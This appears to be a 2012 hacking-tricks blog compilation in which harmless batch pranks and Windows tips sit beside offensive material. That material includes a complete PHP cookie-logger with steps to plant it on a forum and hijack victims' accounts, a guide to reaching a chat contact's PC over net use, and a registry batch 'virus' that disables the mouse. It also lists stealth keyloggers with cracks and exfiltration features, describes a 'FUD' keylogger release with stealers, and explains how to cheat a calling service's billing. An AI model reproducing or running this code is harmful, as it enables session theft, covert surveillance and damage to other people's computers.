Monday, 16 July 2012

Creat virus in ur fnds PC .



Now i will show how to create fake virus in your computer, this is a
good computer & notepad tricksto play with your friends
S, this is the initial step to become a hacker…
1–> open "notepad"
Type the commands given in given below :-
@echo off
C:
cls
echo hello
pause
echo im a virus
pause
echo hurray !! im become a hacker
pause
save the file as "MyTricksTime.bat" extension
for example if your file name is "virus" save it as "virus.bat"
Hurray !!! i had created a virus !!

Create bootable window 7 , vista, xp USB Flash/ Pen Drive


Create bootable window 7 , vista, xp USB Flash/ Pen DriveLets begin the guide without wasting time. Just make sure that you
have a pen drive with 4GB + capacity if you are making a bootable USB
flash drive.
Requirements to create bootable Windows USB:
# Windows 7 or Vista ISO
# Pen drive with 4GB+ (2 GB is sufficient for XP)
# 15 Minutes of free time
Procedure:
1. Insert your USB flash/pen drive to your system and backup all the
data from the USB as your USB drive will be formatted during the
process.
2. Now download software WinToFlash tool (free).(FROM google)
3. Run the tool, and browse to your Windows 7, Vista, or XP DVD files
(make sure that your USB drive letter is correct).
4. Click Create button to begin the bootable USB process. Wait for few
minutes to see the bootable USB.
5. Thats all!

How to remove VIRUS which do not show hidden folders


How to remove VIRUS which do not show hidden foldersHow To Remove the virus Which Makes do not show hidden folder Hey Friends
i have Got a New Trick For Computer
Some of us Found a Virus problem in Which, In the XP u could not
change the setting from "Do Not Show Hidden Folders" to "Show Hidden
Folders"
When u change to "Do Not Show Hidden Folders" to "Show Hidden Folders"
is Again turns into "Do Not Show"
So Friend! Here is the Solution
Follow the steps
1. Go To... Start>run
2. Enter "regedit"
3. In The Registry editor Follow The Steps
hkey_local_machine>software>microsoft
windows>currentversion>explorer>advanced>folder>hidden>showall
4. Now go to right side registry list checkedvalue double click 4 edit
5. chage vale data 1 close registry editor
Hey Dost
Now Ur Problem is Solved
enjoy friends :)

How To Partition Hard Drive Without Losing Data - Computer Tricks.


Before starting note that:
We can partition any drive, even a system drive
We can do it only in Windows XP, Windows 7 and Vista specifically
Follow these simple stepsGo to Start > Right click on My Computer and choose Manage.
Disk Management Window will Pop-up, it may take time to load it since
it fetches for all the hardware and system information in your PC.
After it's fully loaded, go to Storage> Disk management at the left
sidebar. This is where we'll have all the information about storage
devices that are in our PC currently connected and active.
At the right column all the storage media will be listed with their
basic information like File system type, and status.
Now choose the Volume that you want to partition. Right Click on it
and select Shrink Volume option from menu.
As soon as you click on the Shrink Volume option, system will search
for available space in your selected Disk Volume.
This will not take much longer than few seconds. After querying,
Shrink window will pop-up. This is where you'll have to specify the
Volume for next partition.
Look at the total size of available shrink space. Below it, you'll
have to Enter the space to shrink.you must make sure that the size is
not below the total size of space taken by files in that drive.
You can check the used space by right clicking on the drive you are
going to partition and choose Properties.
Click on Shrink button after specifying the size to shrink.
The shrink size is for the value for the partition where your old
files will be contained and remaining size will allocated for your
next partition.
But you'll still not able to access this new drive. You'll have to
format it and specify the drive letter to access them. To do so,
continue reading...... :))
Format the new drive
Right click on unallocated drive and choose New Simple Volume option.
New Simple Volume Wizard Window will popup.
Click on Next button to continue.
In next window, you'll have to specify the size for your new volume.
Set full size if you are satisfied with two partitions; else divide it
again for new partition.
Next choose any drive letter from the available list and click on Next button.
In next window, leave everything as default.
Click on Finish window to complete the wizard.

Fix windows xp corrupted file easily


Today i will show you how to easily fix Windows xp corrupted
files. Its work perfectly on windows xp and might works on windows 7
and windows vista also. Just follow below instruction to fix your
corrupted window.
REQUIREMENTS
PC Running Windows xp
Windows XP CD
HOW TO DO THAT ?
Place Windows XP cd in your CD/DVD drive.
Then Go to Start > Run
Type in sfc /scannow
Now your XP will run fine.

How to block unblock websites ?


Go to Start and then Run.
Type in this C:\WINDOWS\system32\drivers\etc
Now you will see file name Host open that in Notepad.
Below "127.0.0.1 localhost" add IP address of site to be blocked.
To unblock any site just reversed the process.

take control over ur Destop remotely , If u r any where in this globe to ur Pc.


In this tutorial, I am going to teach you how you can control your
computer's basic function using Microsoft Outlook and your Cell Phone
Network. For this tutorial I am demonstrating how a user can shutdown,
restart, hibernate their computer, just by sending an email from their
phone.
To make this happen, all you need is Microsoft Outlook installed on
the PC which you want to control from your cell phone
Now let's begin with the tutorial.First, you need the batch files to perform the Shutdown, Hibernate operation.
For example,
shutdown -r -t 10 -c "shutting down"
Copy this code and paste it in notepad, save it as shutdown.bat
Now open up Microsoft Outlook. I am assuming that you have already
configured it for your Email and I am not going to teach you about
setting mail in Microsoft Outlook. Now we will need to make it so that
Outlook checks your inbox about every minute.
You can do this by going to Tools>Options. Then click on Mail Setup
tab, and then, the Send/Receive button.
Make sure that the Schedule an automatic send/receive every… box is
checked, and set the number of minutes to 1 or anytime you may like.
Now you may close all of these dialog boxes.
Now go to Tools>Rules and Alerts. Click on E-mail Rules tab. In new
window select Check messages when they arrive and click Next.
Now in next page, check on, on this machine only and with specific
words in the subject.
After checking these two values, click on specific words underlined.
Search Text window will open, in the input field type the command that
shuts down the PC. You can use any commands. For prevention of
accidental execution I kept %shutdown% as a command. Click on Add
button after you are done and click on OK.
Now click on Next.
In the next window check mark on start application. In the lower
screen, click on application link.
Now you'll be welcomed to your familiar file open window. Load all
files. And select the batch file that you've created to shutdown your
PC.
If everything went well you'll see the screen similar to below:
Click on Next, again click on next (don't choose any things in this
step). And finally click on Finish button.
You'll have %shutdown% alert shown in the E-mail Rules tab.
Now, when you send a message from your phone to your e-mail address
with the Subject %shutdown%your computer will trigger shutdown.bat
file and instantly executes the command in that batch file finally
leading to shutdown the PC.
You can use any batch file to execute any command.
Hope you loved this tutorial.

hack any1's PC by yahoo messenger.


Hi! friends want to know how you can hack your friend computer through
Yahoo Messenger,than go ahead and read this post.You can Access your
friends computer without his information.Than follow the following
steps and don't forget to post your comments.Hack your friend's PC through Yahoo Messenger
1) Open Command Prompt. Have some one on yahoo messenger send you a
file; while the file is sending, in command prompt type -> netstat -an
press enter
2) It will show alll Active Connections on your computer, in there
under foreign ip for a number thats ends in 5050. this is the persons
ip adress who is sending you the file
3) Now type : net use: h \ (the person's ip adress)shareddocs push
enter wait for message to show up.
4) If it is successful you should get a message saying command prompt
was successful. If you get a error message than your attempt has
failed, probably because the person has security measures in place to
prevent hacking.
5) If you get the message that says command was successful, than go to
my computer. There you will see a file named "shareddocs on (the name
of your computer)" open this file
You are now connected to that person's computer.
Enjoy Guys! and don't forget to post your comments.

Free Calling Worldwide 100% Working

In this tutorial i am going to show you how to make free world wide
phone calls and talk as long as you likeLets start:
YOU WILL NEED JAVA INSTALLED IN YOUR PC
IF YOU NOT HAVE JAVA DOWNLOAD FROM (
http://www.java.com/en/download/manual.jsp )
THEN
First of all download FriendCaller from hear (
http://www.friendcaller.com/WebPhone/Client/FriendCaller.jnlp.)
After it is fully installed, open friend caller from desktop. Then
register. check email and verify account otherwise you will be not
able to call though you have free credits
Then go to your email and confirm your account and you will be
credited $ 0.10 for free calls. So you can only call for 10 seconds
for free but this what I made this tut so you can call free.
Now login with your account.
Then click on the phone icon.
Now comes the great part. Download a software called Cheat Engine from
here (http://www.ziddu.com/download/13655782/CheatEngine561_ehackworld.blogspot.com_.rar.html).
Run the software and click on "Open Process".
Then click on window list.
Select friend caller, and open it.
Now dial number in friend caller. [First test your own number] and click call.
It will start ringing...
Now in Cheat Engine, enable speed hack. Edit speed to 0.00 and click "Apply"

Now enjoy your call. The timer will freeze. You can talk as much as
you want. When you finish call, you will be only charged 0.02 but
after your balance is finished, make new account and enjoy.

Keyboard Dancing Led Light Trick


Today i will be showing you an interesting trick which will let
your keyboard led light to dance. Basicly we will be creating a
vbscript to make caps lock, num lock and scroll lock to perform this
trick. So lets get started. How to do that ?
1. Open Notepad and copy below codes into it.
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
2. Then save this file as led.vbs (.vbs is must)
3. Open your save file and see your keyboard led blinking like
disco lights.

How to disable blinking Led ?
1. First open Task Manager [ctrl+alt+del ]
2. Then Go to process tab.
3. Select wscript.exe
4. Click on End process.

How to creat 1000 folders in ur friends Destop. !!


Hello,here is a trick from which you can make 1000 or even more than
1000 folders in your Victims computer.Just Copy the below code in notepad and save it as 1000folders.bat and
File type as ALL FILES.
CODE:
@echo off
:topmd %random%
goto top
An now run it. It will start creating folders,just close the cmd
window and it'll stop.
TIP:Create a new folder and place this bat insode it and then run it.
Send this to friends via email and enjoy.

Make a virus that disable Mouse


I had previously posted on making different batch files like matrix
effect, opening no of websites with one click which were interesting
and completely harmless but today we will be making a batch virus
which is harmfull it will disable your mouse so think before trying it
on yourself.Open Notepad and copy below codes
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
Save this file as virus.bat
Done you just created your virus.

Advance matrix effects


Open Notepad and copy below code.@echo off
cls
title Enter The Matrix
color 02
set string=Wake up Neo...
set /a len=18
call :DisplayText
ping localhost -n 4 >nul
set string=The Matrix has you...
set /a len=25
call :DisplayText
ping localhost -n 4 >nul
set string=Follow the white rabbit.
set /a len=28
call :DisplayText
ping localhost -n 4 >nul
set string=Knock, knock, Neo...
set /a len=24
call :DisplayText
ping localhost -n 4 >nul

goto matrix

:DisplayText
set /a dispvar =1
set /a len +=1
:DisplayLoop
CALL SET str=%%string:~0,
%dispvar%%%
cls
echo %str%
ping localhost -n 1 >nul
set /a dispvar +=1
if '%dispvar%'=='%len%' goto
enddisplay
goto DisplayLoop
:enddisplay
exit /b
:matrix
setlocal enabledelayedexpansion
for /l %%A in (1,1,39) do (
set /a rnd=!random!%%5+1
if !rnd!==1 (
set /a rnd2=!random!%%26+1
set num=1
for %%A in (A B C D E F G H I J K L
M N O P Q R S T U V W X Y Z) do (
if !rnd2!==!num! (
set add=%%A
)
set /a num+=1
)
) else set /a add=!rnd!%%2
set var=!var! !add!
)
echo !var!
call :matrix
Save the file as matrix.bat (.bat is must)
Done enjoy !!

Make personal diary using notepad


Do you know that you can use your Notepad as a simple digital diary or
a personal Log-Book to keep record of your daily work instead of using
boring pen and book ? Well, if you dont know then follow the below
mentioned steps to make one for yourself !
First open up the Notepad.
Then Type in .LOG (in capital letters) and press enter.
Save it with any name and close it.
Open the file again.
When you open the file again you will see the current
date and time being inserted automatically after the .LOG line. This
will happen automatically every time you reopen the the notepad file.

How to change ur IP address.

In my previous post i had show you how to Grab someone ip address now
i will show you how to change ip address in less then a minute. For
now it will take 2 to 3 minutes but with some practice you can do this
within a minute.
Click on "Start" in the bottom left corner of the screen.
Click on "RUN"
Type in "command" and click OK
You should be now at MSDOS prompt Screen
Type "ipconfig /release" just like that, and press "enter"
Type "exit" and leave the prompt
Right-click on "Network Places" or "My Network Places" on your desktop.
Click on "properties"
Now you should be on a screen with something titled "Local Area
Connection", or something similar to that, and, if you have a network
hooked up, all of your other networks.
Right click on "Local Area Connection" and click "properties"
Double-click on the "Internet Protocol (TCP/IP)" from the list under
the "General" tab
Click on "Use the following IP address" under the "General" tab
Create an IP address (It doesn't matter what it is)
Press "Tab" and it should automatically fill in the "Subnet Mask"
section with default numbers.
Press the "Ok" button here
Hit the "Ok" button again
Now you should be back to the "Local Area Connection" screen.
Right-click back on "Local Area Connection" and go to properties again.
Go back to the "TCP/IP" settings
This time, select "Obtain an IP address automatically"
Click on "Ok"
Hit "Ok" again.
Now you have a New IP address.

100+ Run commands List

Accessibility Options : access.cpl
Add Hardware : hdwwiz.cpl
Add / Remove Programs : appwiz.cpl
Administrative Tools : control admintools
Automatic Updates : wuaucpl.cpl
Wizard file transfer Bluethooth : fsquirt
Calculator : calc
Certificate Manager : certmgr.msc
Character : charmap
Checking disk : chkdsk
Manager of the album (clipboard) : clipbrd
Command Prompt : cmd
Service components (DCOM) : dcomcnfg
Computer Management : compmgmt.msc
DDE active sharing : ddeshare
Device Manager : devmgmt.msc
DirectX Control Panel (if installed) : directx.cpl
DirectX Diagnostic Utility : dxdiag
Disk Cleanup : cleanmgr
System Information : dxdiag
Disk Defragmenter : dfrg.msc
Disk Management : diskmgmt.msc
Partition manager : diskpart
Display Properties : control desktop
Properties of the display (2) : desk.cpl
Properties display (tab "appearance") : control color
Dr. Watson : drwtsn32
Manager vérirficateur drivers : check
Event Viewer : Eventvwr.msc
Verification of signatures of files : sigverif
Findfast (if present) : findfast.cpl
Folder Options : control folders
Fonts (fonts) : control fonts
Fonts folder windows : fonts
Free Cell : freecell
Game Controllers : Joy.cpl
Group Policy (XP Pro) : gpedit.msc
Hearts (card game) : mshearts
IExpress (file generator. Cab) : IExpress
Indexing Service (if not disabled) : ciadv.msc
Internet Properties : inetcpl.cpl
IPConfig (display configuration) : ipconfig / all
IPConfig (displays the contents of the DNS cache) : ipconfig / displaydns
IPConfig (erases the contents of the DNS cache) : ipconfig / flushdns
IPConfig (IP configuration cancels maps) : ipconfig / release
IPConfig (renew IP configuration maps) : ipconfig / renew
Java Control Panel (if present) : jpicpl32.cpl
Java Control Panel (if present) : javaws
Keyboard Properties : control keyboard
Local Security Settings : secpol.msc
Local Users and Groups : lusrmgr.msc
Logout : logoff
Microsoft Chat : winchat
Minesweeper (game) : winmine
Properties of the mouse : control mouse
Properties of the mouse (2) : main.cpl
Network Connections : control NetConnect
Network Connections (2) : ncpa.cpl
Network configuration wizard : netsetup.cpl
Notepad : notepad
NView Desktop Manager (if installed) : nvtuicpl.cpl
Manager links : packager
Data Source Administrator ODBC : odbccp32.cpl
Screen Keyboard : OSK
AC3 Filter (if installed) : ac3filter.cpl
Password manager (if present) : Password.cpl
Monitor performance : perfmon.msc
Monitor performance (2) : perfmon
Dialing Properties (phone) : telephon.cpl
Power Options : powercfg.cpl
Printers and Faxes : control printers
Private Character Editor : eudcedit
Quicktime (if installed) : QuickTime.cpl
Regional and Language Options : intl.cpl
Editor of the registry : regedit
Remote desktop connection : mstsc
Removable Storage : ntmsmgr.msc
requests the operator to removable storage : ntmsoprq.msc
RSoP (traduction. ..) (XP Pro) : rsop.msc
Scanners and Cameras : sticpl.cpl
Scheduled Tasks : control schedtasks
Security Center : wscui.cpl
Console management services : services.msc
shared folders : fsmgmt.msc
Turn off windows : shutdown
Sounds and Audio Devices : mmsys.cpl
Spider (card game) : spider
Client Network Utility SQL server : cliconfg
System Configuration Editor : sysedit
System Configuration Utility : msconfig
System File Checker (SFC =) (Scan Now) : sfc / scannow
SFC (Scan next startup) : sfc / scanonce
SFC (Scan each démarraget) : sfc / scanboot
SFC (back to default settings) : sfc / revert
SFC (purge cache files) : sfc / purgecache
SFC (define size CAHC x) : sfc / cachesize = x
System Properties : sysdm.cpl
Task Manager : taskmgr
Telnet client : telnet
User Accounts : nusrmgr.cpl
Utility Manager (Magnifier, etc) : utilman
Windows firewall (XP SP2) : firewall.cpl
Microsoft Magnifier : magnify
Windows Management Infrastructure : wmimgmt.msc
Protection of the accounts database : syskey
Windows update : wupdmgr
Introducing Windows XP (if not erased) : tourstart
Wordpad : write
Date and Time Properties : timedate.cpl

Control your computer through SMS – Free of Cost

Control your computer through SMS – Free of Cost
The most convenient way to control the PC/System, while you are not at home is controlling it by SMS. Not only Home it can be Office also, in a way you can say controlling the computer wirelessly or remotely. This feature can be widely implemented in the country like India where SMS cost are very cheap.
Yes, you can also control your system through blue-tooth of mobile for this you can head on to my previous article here:  Control PC via Bluetooth of mobile.

Coming to the point, to control a PC through SMS, your system should be connected to internet. The service I am going to tell is Free of cost, it depends only on your service provider SMS charges. If you have FREE SMS packs of 10 digit mobile number then its totally FREE.
Well the thing we will need to have is twitter.com account, if you dont have one then you can make it on twitter.
Second thing we will need to have ” TweetMyPC ” software which again is a freeware and can be downloaded from here : Click to download directly. TweetMyPC basically runs on the PC all the time to monitor the Twitter updates for the account which you created earlier in background. So, this software should run always on PC. After installing TweetMyPC you will need to configure it correctly.
For that here we go :
> Run TweetMyPC by clicking on its icon from Desktop. It will start running in background, you can view it in system tray :
Control your computer through SMS – Free of Cost
> Right Click on the icon and select Edit Setting. Now a new window will appear asking you username and password of Twitter. Fill in the username and password of the Twitter account Correctly.
Control your computer through SMS – Free of Cost
> Save and close the window.
Now we are done with this stage of setup.
For updating Twitter status/controlling PC through SMS :
> For completing this step, we will head on to a FREE status update service which is available in India. It is here: http://www.smstweet.in/
Control your computer through SMS – Free of Cost
> Open the site, and click on ” Sign in with Twitter ” button. Allow the site to access Twitter. And enter you mobile number, through which you are going to update it. This is the one way of registering your mobile, or you can also Setup your mobile by Simply Sending SMS  ‘ TWEET REGISTER to 09220092200.
Now you are done. Start controlling your system wirelessly. But before that where are the commands which you will use to control your PC ?
List of Commands to Control PC:
>To shut down the PC you will need to send SMS asTWEET Shutdown ” to 09220092200 , without quotation.
Here are some more commands, but before sending those you will need to add TWEET word before each command.
Control your computer through SMS – Free of Cost

How To Hack any Account By CookieLogger | Create a CookieLogger and Hack any Account




 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.
What is a CookieLogger?
A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.
Today I am going to show How to make your own Cookie Logger…Hope you will enjoy Reading it …
Step 1: Save the notepad file from the link below and Rename it as Fun.gif:
Download it.
Step 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php:

$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>
Step 3: Create a new Notepad File and Save it as logfile.txt
Step 4: Upload this file to your server
cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif
If you don’t have any Website then you can use the following Website to get a Free Website which has php support :
http://0fees.net
Step 5: Go to the victim forum and insert this code in the signature or a post :
Download it.
Step 6: When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9
Step 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.
Step 8: Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.
Note : Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.
Disclaimer: I don’t take Responsibility for what you do with this script, served for Educational purpose only
Enjoy !!

How To Create a Virtual WiFi Network on Windows 7

The new recent feature of Microsoft Windows 7 allows you to share your internet connection with several other Wireless enabled device users. This feature allows you to create your own hotspot network and help people around you to access your internet connection through by offering virtual router services from you own computer system.
There are different softwares launched on the internet which are designed for people to gain full advantage of this new windows feature. Many of them are free of charge but they come with a range of problemsrelated to connectivity issues, while others have a cost attached to them. Many people are not aware that there exists a very simple way through which one can easily create their own hotspot network and allows others to access your internet from one single source.
Virtual Wifi on Windows 7
Command Prompt is a built-in program found in all windows operating system. In windows 7, one can use this command program to set up their own Wi-Fi network (hotspot network) through their computer in a few simple steps.
Step 1: Open Command Prompt
For users of windows 7, first click on ‘start menu‘ icon. After this, type the term ‘cmd’ in the search box to find the program. CMD is a short form for the command prompt program. This program is also found in all programs folder of the start menu. However, to quickly access it, search box in start menu is a more viable option. Refer to this Screenshot.
Step 2: Establishing the Virtual Router Connection
After you open command prompt, a set of command options have to be typed in to establish the network. Remember! Command prompt does not recognize simple English language commands. Instead, proper computer terms have to be entered to establish the connection.
Here is the command prompt which should be used to initially set up the connection.
Netsh wlan set hostednetwork mode=allow ssid=MyNetwork key=MyKey
KeyUsuage=persistent
These command prompts represent formulating the following options which are a part of access the network connection.
1.       Netsh wlan set hostednetwork mode=allow
This option is commanding the system to activate the virtual Wi-Fi connection. This will enable the virtual wireless connection of the computer.
2.       SSID=MyNetwork
This option is commanding the system to broadcast the network name with MyNetwork. The phrase MyNetwork can be replaced with any other name which suits a certain person i.e. JamesNet, AlexHostedNetwork etc.
3.       Key=MyKey
Similar to the SSID command, this option enables you to define your own security key for the network. This key has to Alpha numeric.
4.       KeyUsage
This option should only be used in case one needs to use the same setting set over and over again. If you only plan on using this internet connection once, then you are not required to enter this option at all.
Step 3: Activating the Connection
Once the connection settings are established, there is separate command prompt required to activate the connection. Go back to the command box and enter the following:
netsh wlan start hostednetwork
After entering this command prompt, the virtual network will be activated.
Step 4: Sharing the Internet Connection
After the virtual network has been activated, the main internet connection has to be shared with the hosted network in order to let other hosted network users to access the internet. For this, right click on the main network connection and open properties. In properties option, click on the sharing tab and from those options, choose the wireless connection which is virtually hosting the established Wi-Fi network.
After successfully completely all these steps, a user will be able to successfully share his or her internet with other users through the established network.
In some cases, other users will have to assign a static IP manually to access the network. This normally is the case with Smartphone users.

Sunday, 15 July 2012

Keylogger - collection


 


Keystroke logging (often called keylogging) is a diagnostic tool used in software development that captures the user's keystrokes. It can be useful to determine sources of error in computer systems and is sometimes used to measure employee productivity on certain clerical tasks. Such systems are also highly useful for law enforcement and espionage—for instance, providing a means to obtain passwords or encryption keys and thus bypassing other security measures. However, keyloggers are widely available on the Internet and can be used by private parties to spy on the computer usage of others.

Writing software applications for keylogging is trivial, and like any computer program can be distributed as atrojan horse or as part of a virus. What is not trivial however, is installing a keystroke logger without getting caught and downloading data that has been logged without being traced. An attacker that manually connects to a host machine to download logged keystrokes risks being traced. A trojan that sends keylogged data to a fixed e-mail address or IP address risks exposing the attacker.

lets see some of the key logger's

Local Keylogger Pro 3.1 - Local Keylogger Pro allows you to monitor all users' activity on any computers in real time and record each computer's usage history. Local Keylogger Pro makes it easy to view, in real time, the screenshots of the any computers, all typed keystrokes, visited Web sites, used programs. You can view a list of running processes and terminate undesirable ones. Local Keylogger Pro can record all user activity to the log file. This information can be exported to HTML for convenient viewing in your web browser, or exported to MHT file for analysis. This allows you to see how long users worked with particular programs, how much time they spent on Internet, what sites they visited, what they typed in e-mails or chats.[Download ][Crack ]

XP Advanced Keylogger 2.5 - XP Advanced Keylogger is a top-rated invisible easy-to-use surveillance tool that records every keystroke to a log file. The log file can be sent secretly with email or FTP to a specified receiver. It can also detection specified keywords and take a screenshot whenever one is typed, displaying findings in a tidy log viewer. It causes no suspicious slowdowns and takes very few system resources. all this is happening in full stealth mode so the person you are monitoring will never be aware of it.{Windows 95, NT4, 98, Me, 2000, XP} [Download ][Crack ]

Blazing Tools Perfect Keylogger 1.67 - Perfect Keylogger is a new generation keylogger which is absolutely undetectable. It was created as an alternative to very expensive commercial products like iSpyNow, Spector Keylogger or E-Blaster. It has the same functionality, but is significantly easier to use. Complex internal mechanisms are hidden from the user behind the friendly interface. You can install Keylogger and immediately use it without changing of its settings.

Perfect Keylogger is an extremely compact, award-winning tool. It is translated into 20 languages and is increasingly popular around the world! It lets you record all keystrokes, the time they were made and the application where they were entered. It works in the absolutely stealth mode. Stealth mode means that no button or icon is present in the Task Bar, and no process title is visible in the Task Manager list.

Also, Perfect Keylogger can carry out visual surveillance. It periodically makes screenshots in invisible mode and stores the compressed images on the disk so you can review them later.
Perfect Keylogger was the first keylogging software solution which can be absolutely invisible in the Windows NT/2000/XP/Vista Task Manager![Download ][Crack ]

SC Keylogger Pro V3.2 - A Commercial Key Logger is a program that captures and logs keystrokes as they are entered on the computer for the purpose of monitoring the user. The logged data, which may be encrypted, is saved or sent to the person who installed the key logger. These applications often run in stealth mode and are invisible to the user that is being monitored. Such key loggers are sold commercially and may be used legitimately if deployed by authorized administrators and disclosed to the persons being monitored, as in a business environment. The use of a key logger to monitor persons without their knowledge has been ruled illegal in at least one jurisdiction.[Download ]

Hook Keylogger v2.1 - Small and stealth keylogger without an installer; simplest keylogger possible Specify log file location Uses a WH_JOURNALRECORD hooking procedure to capture everything typed Hide and unhide the interface by pressing Ctrl+Shift+F7 [Download ][Crack ]

Advanced Invisible Keylogger 1.8 - Advanced Invisible Keylogger is an stealth spy tool, the best spy software offered by ToolAnywhere! Advanced Invisible Keylogger runs silently at the lowest level of Windows capturing every keystroke including usernames and windows log-on passwords.

Advanced Invisible Keylogger can also capture active window text, text typed in all popular instant messengers including AOL, YAHOO, ICQ, MSN and AIM.

All Desktop activity will be recorded through Advanced Invisible Keylogger’s secret! Have reports sent to your email address at anytime secretly! Advanced Invisible Keylogger is so stealthy and hides so well that not even a computer technician with years of experience can detect it running!

The most powerful stealth program at a most affordable price! An easy-to-use stealth solution for PC and Internet surveillance. Purchase your copy today and feel safe and secure.[Download ]


KLG:Download 

Type: Keylogger
A Plus: Download 
Type: Keylogger
Curiosity: Download 
Type: Keylogger
This keylogger will store all keystrokes in

C:\windows\KeyLogs.txt
Elitek3yl0gg3r10: Download 
Type: Keylogger
1)No Process Visible in any Task manager,Process explorer(2k,xp,9x)
2)Injects into Explorer.exe on startup and exiting the parent.
3)Firewall bypassing by injecting code into IE and sending mail
4)Invisible Startup, will not show in msconfig,autorun.exe (sysinternals)
5)Automatic Uninstall
6)Protucted Storage ,Cashed Passwords sender
7)No need ur own SMTP server(sending directly) to MX.
8)Remote Installer,Uninstaller
9)Built in Binder makes the keylogger same as the binded EXE(Icon,Version)
0)HTML formatted logs
11)Detect ICQ/MSN/AOL/Yahoo Chats.
12)Logging Window names,All keys typed in that window.
13)EXE Size is 12.7 KB
FKS: Download 
Type: Keylogger
Fearless Keyspy v2.0 has a very small (2.5 KB) assembly server,
with a low memory usage.
New features include a "webget" feature, a better GUI and lots of
deeper server and editor improvements
FKWP20: Download 
Type: Keylogger
1)logging all keystrokes
2) Download 2 urls cab files and extracting and executing the inside exes (Firewall bypass)
3) Protected storage (Outlook, IE stored passes),Cashed Dialup passes Sender
4) keystrokes ,passes will mail to the email id,daily or the log size is over
5) firewall bypassing by injecting code into IE and sending mail
6) No Process visible ,injects into Explorer.exe on startup and exiting
7) Active Setup Startup
8) EXE size is 11.9 KB
9) encrypted log file
10) File manager for controlling remote system
K3Yl0G3R: Download 
Type: Keylogger
For more hacking tools , warez , full appz , ip scanners and tons
of direct illegal downloads at http://www.openpc.co.nr
Key Copy: Download 
Type: Keylogger
You use KEYCOPY to keep a record of any keyboard activity on your computer.
This includes usage in Wordperfect 5.0,Multimate,Norton Editor. Keycopy copy's
each keystroke to a buffer within the KEYCOPY program area. When the keycopy
buffer has 200 keystrokes in memory, keycopy will copy the buffer to a file
with a date and time stamp. The file default is c:\keycopy. You can specify
drive,subdirectory and file name by having the parameter file called KC.PRM
in the subdirectory where KEYCOPY is executed from. If you change the KC.PRM
file and want the change to take effect with keycopy. The computer will have
to be rebooted, and Keycopy executed again. Keycopy has been tested and used
with DOS 3.3 and 4.0 and uses less than 3k of memory.
skl01: Download 
Type: Keylogger
1)Targetted keylogging(logs only the keys from the specifyed windows)
2)keystrokes will mail to the email id,daily or the log size is over
3)firewall bypassing by injecting code into IE and sending mail
4) Deleting all Cookies at installation.
5) EXE size is 8.5kb
6) we can create  our own keylogger using the editor,we can specify the window titiles (the keys need to log),our email id,smtp server,log size)

How to decrypt passwords


If you dont already know how to decrypt passwords that some files maybe protected with this is a simple tutorial on how to go about it ..

say for instance the password looks like this


Y=avb=MNn=qBXp7yS5RiUE7OUo7CaYpwSzqIYEapUj/=R0hXY6W5mLQ5mLQT

atom-128+ base-64+ tripo-5+ (these are the crypters )

so what you do is goto

http://www.crypo.com/


ok we know it has been crypted using the above crypters

copy the above crypted text

then find tripo-5 decrypt on the website and paste the code into the box and click on decrypt

then use base-64 and do the same as above

and finally use atom-128 do the same

there you should find the password


hope it helps a few people out

Xenon 3 Keylogger


I'm releasing Xenon 3

it isnt mine, it was released by Asphyxiate on HF.

Notes i will put here, then pictures, then a download link :)

If you have a problem compiling your logger, run it as an administrator.

virus scan - http://virusscan.jotti.org/en-gb/scanres...c661832664
I'm not 100% why it says 2/20, but just sandbox it if you want to or whatever :)

pics:

[Image: 97573046.png]
[Image: 42323888.png]
[Image: 48298676.png]
[Image: 29399819.png]
[Image: 34085388.png]
[Image: 92032257.png]


Download normal version here :)

Features:

▲▲ CodeDOM
▲▲ Advanced Key Parsing
▲▲ Crystal Clear Logging
▲▲ FUD!
▲▲ Data.DB Stealer
▲▲ Screenshots
▲▲ Force Options (Force Restart, Force shutdown etc)
▲▲ Antis Including: AntiSandboxie, AntiAnubis, AntiMAMB + More!
▲▲ Optional disabling of crucial system restoring services (sys restore, regedit)
▲▲ Advanced persistence
▲▲ Internet Browser cookie deletion upon execution
▲▲ Nice GUI
▲▲ Flawlessly built in Icon Changer
▲▲ Flawlessly built in Extension Spoofer. (Make your virus end in ANY extension!)
▲▲ Background working SMTP Test to see if your credentials are correct. (WIll not lag the GUI at all)
▲▲ Melt Options
▲▲ Startup options
▲▲ Anti-Faggotry Options
▲▲ Built in Non-Distributing Virus Scanner process start
▲▲ Clipboard stealer
